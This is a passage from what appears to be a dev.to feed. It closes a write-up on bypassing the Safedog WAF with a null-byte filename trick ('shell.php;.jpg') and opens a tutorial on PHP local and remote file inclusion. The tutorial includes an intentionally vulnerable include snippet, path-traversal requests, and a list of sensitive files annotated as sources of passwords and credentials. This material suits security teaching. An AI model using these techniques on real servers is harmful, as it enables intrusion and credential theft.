&lt;p&gt;The script was written for Python 2.7 (note the Python 2 &lt;code&gt;print&lt;/code&gt; statements); run it in a Python 2 environment with the required libraries installed.&lt;/p&gt;

&lt;p&gt;The test result indicated that a boundary length of 3710 characters was effective:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjvutvjl25sixaks9ci0f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjvutvjl25sixaks9ci0f.png" alt=" " width="799" height="376"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Although the file was not actually uploaded to the server (because of a restriction in the target environment), the Safedog WAF was successfully bypassed.&lt;/p&gt;

&lt;p&gt;The crafted packet was then sent via Burp Suite:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzag2rdb4ew9mcf3rkfx7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzag2rdb4ew9mcf3rkfx7.png" alt=" " width="800" height="418"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The bypass was achieved.&lt;/p&gt;

&lt;h3&gt;
  
  
  Practical Case 2 – Bypassing Using Null Byte Truncation
&lt;/h3&gt;

&lt;p&gt;The file was uploaded while intercepting with Burp Suite, and the &lt;code&gt;filename&lt;/code&gt; value was changed to: &lt;code&gt;shell.php;.jpg&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9wh8n3buawxi169el5yz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9wh8n3buawxi169el5yz.png" alt=" " width="797" height="90"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The hex view was then opened (the semicolon’s hexadecimal value is &lt;code&gt;0x3b&lt;/code&gt;), and &lt;code&gt;3b&lt;/code&gt; was altered to &lt;code&gt;00&lt;/code&gt;:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwnorizf464pzhszhla8q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwnorizf464pzhszhla8q.png" alt=" " width="800" height="517"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The packet was sent.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fse88tmugeopton4xrf5d.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fse88tmugeopton4xrf5d.png" alt=" " width="799" height="373"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The bypass was successful.&lt;/p&gt;

</description>
      <category>firewall</category>
      <category>cybersecurity</category>
      <category>vulnerabilities</category>
      <category>waf</category>
    </item>
    <item>
      <title>Different ways to get a shell using PHP file inclusion vulnerabilities</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Mon, 08 Jun 2026 01:16:52 +0000</pubDate>
      <link>https://dev.to/excalibra/different-ways-to-get-a-shell-using-php-file-inclusion-vulnerabilities-11n2</link>
      <guid>https://dev.to/excalibra/different-ways-to-get-a-shell-using-php-file-inclusion-vulnerabilities-11n2</guid>
      <description>&lt;h2&gt;
  
  
  Related Functions
&lt;/h2&gt;

&lt;p&gt;The following four functions in PHP are typically responsible for file inclusion vulnerabilities:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;a href="http://www.php.net/manual/en/function.include.php" rel="noopener noreferrer"&gt;&lt;code&gt;include()&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://php.net/manual/en/function.include-once.php" rel="noopener noreferrer"&gt;&lt;code&gt;include_once()&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://php.net/manual/en/function.require.php" rel="noopener noreferrer"&gt;&lt;code&gt;require()&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://php.net/manual/en/function.require-once.php" rel="noopener noreferrer"&gt;&lt;code&gt;require_once()&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;If an error occurs during inclusion with &lt;code&gt;require()&lt;/code&gt; (e.g., the file does not exist), execution halts immediately and no subsequent statements run.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fod3vli5550j5aw03mm7z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fod3vli5550j5aw03mm7z.png" alt=" " width="800" height="188"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If an error occurs with &lt;code&gt;include()&lt;/code&gt;, only a warning is issued, and execution continues with subsequent statements.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjak8aggh7a5itydqcs04.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjak8aggh7a5itydqcs04.png" alt=" " width="799" height="200"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;require_once()&lt;/code&gt; and &lt;code&gt;include_once()&lt;/code&gt; behave similarly to &lt;code&gt;require()&lt;/code&gt; and &lt;code&gt;include()&lt;/code&gt;, respectively. If a file has already been included, &lt;code&gt;require_once()&lt;/code&gt; and &lt;code&gt;include_once()&lt;/code&gt; will not include it again, thereby avoiding issues such as function redefinition or variable reassignment.&lt;/p&gt;

&lt;p&gt;When these four functions are used to include a file, its contents are interpreted as PHP code regardless of the file's extension or type (e.g., an image or a text file). Test code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
    &lt;span class="nv"&gt;$file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$_GET&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'file'&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="k"&gt;include&lt;/span&gt; &lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In the same directory, there is a file named &lt;code&gt;phpinfo.txt&lt;/code&gt; with the following content: &lt;code&gt;&amp;lt;?php phpinfo(); ?&amp;gt;&lt;/code&gt;. Simply visit:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;fileinclude.php?file&lt;span class="o"&gt;=&lt;/span&gt;phpinfo.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This will successfully execute &lt;code&gt;phpinfo()&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg64mvr1un3k0uj65jhdh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg64mvr1un3k0uj65jhdh.png" alt=" " width="800" height="192"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Scenario
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;The application uses one of the relevant file inclusion functions.&lt;/li&gt;
&lt;li&gt;The file inclusion function uses a dynamic variable, e.g., &lt;code&gt;include $file;&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;An attacker can control that variable, e.g., &lt;code&gt;$file = $_GET['file'];&lt;/code&gt;.&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Classification
&lt;/h3&gt;

&lt;h4&gt;
  
  
  LFI (Local File Inclusion)
&lt;/h4&gt;

&lt;p&gt;Local File Inclusion (LFI) refers to vulnerabilities that allow an attacker to include and execute files already present on the server. Most file inclusion vulnerabilities encountered in practice are LFI.&lt;/p&gt;

&lt;p&gt;This type of vulnerability is not affected by the &lt;code&gt;allow_url_fopen&lt;/code&gt; or &lt;code&gt;allow_url_include&lt;/code&gt; settings. For example, setting both to &lt;code&gt;Off&lt;/code&gt; in &lt;code&gt;php.ini&lt;/code&gt; and restarting the server:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2aah6dkonifxu4qiypgn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2aah6dkonifxu4qiypgn.png" alt=" " width="800" height="215"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Visiting &lt;code&gt;?page=../../../phpinfo.php&lt;/code&gt; still successfully parses &lt;code&gt;phpinfo()&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff6diwtlt5s815vlhztg1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff6diwtlt5s815vlhztg1.png" alt=" " width="800" height="224"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  RFI (Remote File Inclusion)
&lt;/h4&gt;

&lt;p&gt;Remote File Inclusion (RFI) allows an attacker to include and execute files from a remote server. Since the remote file is under the attacker's control, this vulnerability can be extremely harmful. However, RFI has stricter prerequisites, requiring the following &lt;code&gt;php.ini&lt;/code&gt; configurations:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;code&gt;allow_url_fopen = On&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;allow_url_include = On&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Both must be &lt;code&gt;On&lt;/code&gt; for remote file inclusion to succeed. For example, setting both to &lt;code&gt;Off&lt;/code&gt; and restarting the server:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2aah6dkonifxu4qiypgn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2aah6dkonifxu4qiypgn.png" alt=" " width="800" height="215"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Visiting &lt;code&gt;?page=http://192.168.1.4&lt;/code&gt; will produce errors:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;
&lt;span class="nc"&gt;Warning&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="k"&gt;include&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="o"&gt;://&lt;/span&gt; &lt;span class="n"&gt;wrapper&lt;/span&gt; &lt;span class="n"&gt;is&lt;/span&gt; &lt;span class="n"&gt;disabled&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;server&lt;/span&gt; &lt;span class="n"&gt;configuration&lt;/span&gt; &lt;span class="n"&gt;by&lt;/span&gt; &lt;span class="n"&gt;allow_url_fopen&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt; &lt;span class="nc"&gt;D&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="n"&gt;\phpStudy\PHPTutorial\WWW\DVWA\vulnerabilities\fi\index&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="n"&gt;php&lt;/span&gt; &lt;span class="n"&gt;on&lt;/span&gt; &lt;span class="n"&gt;line&lt;/span&gt; &lt;span class="mi"&gt;36&lt;/span&gt;

&lt;span class="nc"&gt;Warning&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="k"&gt;include&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="o"&gt;://&lt;/span&gt;&lt;span class="mf"&gt;192.168.1.4&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="n"&gt;failed&lt;/span&gt; &lt;span class="n"&gt;to&lt;/span&gt; &lt;span class="n"&gt;open&lt;/span&gt; &lt;span class="n"&gt;stream&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="n"&gt;no&lt;/span&gt; &lt;span class="n"&gt;suitable&lt;/span&gt; &lt;span class="n"&gt;wrapper&lt;/span&gt; &lt;span class="n"&gt;could&lt;/span&gt; &lt;span class="n"&gt;be&lt;/span&gt; &lt;span class="n"&gt;found&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt; &lt;span class="nc"&gt;D&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="n"&gt;\phpStudy\PHPTutorial\WWW\DVWA\vulnerabilities\fi\index&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="n"&gt;php&lt;/span&gt; &lt;span class="n"&gt;on&lt;/span&gt; &lt;span class="n"&gt;line&lt;/span&gt; &lt;span class="mi"&gt;36&lt;/span&gt;

&lt;span class="nc"&gt;Warning&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="k"&gt;include&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nc"&gt;Failed&lt;/span&gt; &lt;span class="n"&gt;opening&lt;/span&gt; &lt;span class="s1"&gt;'http://192.168.1.4'&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nf"&gt;inclusion&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;include_path&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'.;C:\php\pear;../../external/phpids/0.6/lib/'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt; &lt;span class="nc"&gt;D&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="n"&gt;\phpStudy\PHPTutorial\WWW\DVWA\vulnerabilities\fi\index&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="n"&gt;php&lt;/span&gt; &lt;span class="n"&gt;on&lt;/span&gt; &lt;span class="n"&gt;line&lt;/span&gt; &lt;span class="mi"&gt;36&lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmyzjntin2u8ktiu0j9e0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmyzjntin2u8ktiu0j9e0.png" alt=" " width="799" height="251"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After setting both configuration options back to &lt;code&gt;On&lt;/code&gt; and restarting the server, remote file inclusion works.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7t8skc4zgmyvz6o0t0ps.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7t8skc4zgmyvz6o0t0ps.png" alt=" " width="800" height="529"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Absolute Paths of Sensitive Files
&lt;/h3&gt;

&lt;p&gt;This article provides more detail: &lt;a href="https://dev.to/excalibra/windows-and-linux-sensitive-directory-path-summary-3b1o"&gt;Summary of Sensitive Directory Paths in Windows and Linux&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Below is a list of absolute paths for commonly used sensitive files:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Windows:&lt;/span&gt;
c:/boot.ini                                 &lt;span class="c"&gt;# View system version&lt;/span&gt;
c:/windows/php.ini                          &lt;span class="c"&gt;# PHP configuration&lt;/span&gt;
c:/windows/my.ini                           &lt;span class="c"&gt;# MySQL configuration (may contain credentials)&lt;/span&gt;
c:/winnt/php.ini
c:/winnt/my.ini
C:&lt;span class="se"&gt;\W&lt;/span&gt;indows&lt;span class="se"&gt;\w&lt;/span&gt;&lt;span class="k"&gt;in&lt;/span&gt;.ini                          &lt;span class="c"&gt;# System configuration file&lt;/span&gt;
c:&lt;span class="se"&gt;\m&lt;/span&gt;ysql&lt;span class="se"&gt;\d&lt;/span&gt;ata&lt;span class="se"&gt;\m&lt;/span&gt;ysql&lt;span class="se"&gt;\u&lt;/span&gt;ser.MYD                &lt;span class="c"&gt;# MySQL user passwords&lt;/span&gt;
c:&lt;span class="se"&gt;\P&lt;/span&gt;rogram Files&lt;span class="se"&gt;\R&lt;/span&gt;hinoSoft.com&lt;span class="se"&gt;\S&lt;/span&gt;erv-U&lt;span class="se"&gt;\S&lt;/span&gt;ervUDaemon.ini   &lt;span class="c"&gt;# Virtual host paths and passwords&lt;/span&gt;
c:&lt;span class="se"&gt;\P&lt;/span&gt;rogram Files&lt;span class="se"&gt;\S&lt;/span&gt;erv-U&lt;span class="se"&gt;\S&lt;/span&gt;ervUDaemon.ini
c:&lt;span class="se"&gt;\w&lt;/span&gt;indows&lt;span class="se"&gt;\s&lt;/span&gt;ystem32&lt;span class="se"&gt;\i&lt;/span&gt;netsrv&lt;span class="se"&gt;\M&lt;/span&gt;etaBase.xml    &lt;span class="c"&gt;# IIS virtual host configuration&lt;/span&gt;
c:&lt;span class="se"&gt;\w&lt;/span&gt;indows&lt;span class="se"&gt;\r&lt;/span&gt;epair&lt;span class="se"&gt;\s&lt;/span&gt;am                       &lt;span class="c"&gt;# Windows initial installation password&lt;/span&gt;
c:&lt;span class="se"&gt;\P&lt;/span&gt;rogram Files&lt;span class="se"&gt;\S&lt;/span&gt;erv-U&lt;span class="se"&gt;\S&lt;/span&gt;ervUAdmin.exe      &lt;span class="c"&gt;# Serv-U admin password (pre-6.0)&lt;/span&gt;
c:&lt;span class="se"&gt;\P&lt;/span&gt;rogram Files&lt;span class="se"&gt;\R&lt;/span&gt;hinoSoft.com&lt;span class="se"&gt;\S&lt;/span&gt;ervUDaemon.exe
C:&lt;span class="se"&gt;\D&lt;/span&gt;ocuments and Settings&lt;span class="se"&gt;\A&lt;/span&gt;ll Users&lt;span class="se"&gt;\A&lt;/span&gt;pplication Data&lt;span class="se"&gt;\S&lt;/span&gt;ymantec&lt;span class="se"&gt;\p&lt;/span&gt;cAnywhere&lt;span class="se"&gt;\*&lt;/span&gt;.cif  &lt;span class="c"&gt;# pcAnywhere login passwords&lt;/span&gt;
c:&lt;span class="se"&gt;\P&lt;/span&gt;rogram Files&lt;span class="se"&gt;\A&lt;/span&gt;pache Group&lt;span class="se"&gt;\A&lt;/span&gt;pache&lt;span class="se"&gt;\c&lt;/span&gt;onf&lt;span class="se"&gt;\h&lt;/span&gt;ttpd.conf or C:&lt;span class="se"&gt;\a&lt;/span&gt;pache&lt;span class="se"&gt;\c&lt;/span&gt;onf&lt;span class="se"&gt;\h&lt;/span&gt;ttpd.conf  &lt;span class="c"&gt;# Apache configuration&lt;/span&gt;
c:/Resin-3.0.14/conf/resin.conf             &lt;span class="c"&gt;# Resin configuration (JSP)&lt;/span&gt;
c:/Resin/conf/resin.conf
/usr/local/resin/conf/resin.conf
d:&lt;span class="se"&gt;\A&lt;/span&gt;PACHE&lt;span class="se"&gt;\A&lt;/span&gt;pache2&lt;span class="se"&gt;\c&lt;/span&gt;onf&lt;span class="se"&gt;\h&lt;/span&gt;ttpd.conf
C:&lt;span class="se"&gt;\P&lt;/span&gt;rogram Files&lt;span class="se"&gt;\m&lt;/span&gt;ysql&lt;span class="se"&gt;\m&lt;/span&gt;y.ini
C:&lt;span class="se"&gt;\m&lt;/span&gt;ysql&lt;span class="se"&gt;\d&lt;/span&gt;ata&lt;span class="se"&gt;\m&lt;/span&gt;ysql&lt;span class="se"&gt;\u&lt;/span&gt;ser.MYD                &lt;span class="c"&gt;# MySQL user passwords&lt;/span&gt;

&lt;span class="c"&gt;# Linux/Unix:&lt;/span&gt;
/usr/local/app/apache2/conf/httpd.conf      &lt;span class="c"&gt;# Apache2 default configuration&lt;/span&gt;
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf  &lt;span class="c"&gt;# Virtual host settings&lt;/span&gt;
/usr/local/app/php5/lib/php.ini             &lt;span class="c"&gt;# PHP settings&lt;/span&gt;
/etc/sysconfig/iptables                     &lt;span class="c"&gt;# Firewall rules&lt;/span&gt;
/etc/httpd/conf/httpd.conf                  &lt;span class="c"&gt;# Apache configuration&lt;/span&gt;
/etc/rsyncd.conf                            &lt;span class="c"&gt;# rsync configuration&lt;/span&gt;
/etc/my.cnf                                 &lt;span class="c"&gt;# MySQL configuration&lt;/span&gt;
/etc/redhat-release                         &lt;span class="c"&gt;# System version&lt;/span&gt;
/etc/issue
/etc/issue.net
/usr/local/app/php5/lib/php.ini
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf
/etc/httpd/conf/httpd.conf or /usr/local/apche/conf/httpd.conf
/usr/local/resin-3.0.22/conf/resin.conf
/usr/local/resin-pro-3.0.22/conf/resin.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf
/etc/sysconfig/iptables
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Inclusion Techniques
&lt;/h2&gt;

&lt;p&gt;The following examples use this test code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
    &lt;span class="nv"&gt;$file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$_GET&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'file'&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="k"&gt;include&lt;/span&gt; &lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Unless stated otherwise, the examples assume the PHP defaults: &lt;code&gt;allow_url_fopen = On&lt;/code&gt; and &lt;code&gt;allow_url_include = Off&lt;/code&gt; (note that &lt;code&gt;allow_url_include&lt;/code&gt; is deprecated as of PHP 7.4). Any additional requirements are noted where applicable.&lt;/p&gt;

&lt;h3&gt;
  
  
  PHP Pseudo-Protocols
&lt;/h3&gt;

&lt;p&gt;PHP provides numerous built-in URL-style wrappers that can be used with filesystem functions such as &lt;code&gt;fopen()&lt;/code&gt;, &lt;code&gt;copy()&lt;/code&gt;, &lt;code&gt;file_exists()&lt;/code&gt;, and &lt;code&gt;filesize()&lt;/code&gt;. In addition, custom wrappers can be registered via &lt;code&gt;stream_wrapper_register()&lt;/code&gt;. The pseudo-protocols relevant here are the following supported protocols and wrappers (12 types):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight kotlin"&gt;&lt;code&gt;&lt;span class="n"&gt;file&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — Access local filesystem&lt;/span&gt;
&lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — Access HTTP(s) URLs&lt;/span&gt;
&lt;span class="n"&gt;ftp&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — Access FTP(s) URLs&lt;/span&gt;
&lt;span class="n"&gt;php&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — Access various I/O streams&lt;/span&gt;
&lt;span class="n"&gt;zlib&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — Compression streams&lt;/span&gt;
&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — Data (RFC 2397)&lt;/span&gt;
&lt;span class="n"&gt;glob&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — Find matching file path patterns&lt;/span&gt;
&lt;span class="n"&gt;phar&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — PHP Archive&lt;/span&gt;
&lt;span class="n"&gt;ssh2&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — Secure Shell 2&lt;/span&gt;
&lt;span class="n"&gt;rar&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — RAR&lt;/span&gt;
&lt;span class="n"&gt;ogg&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;// — Audio streams&lt;/span&gt;
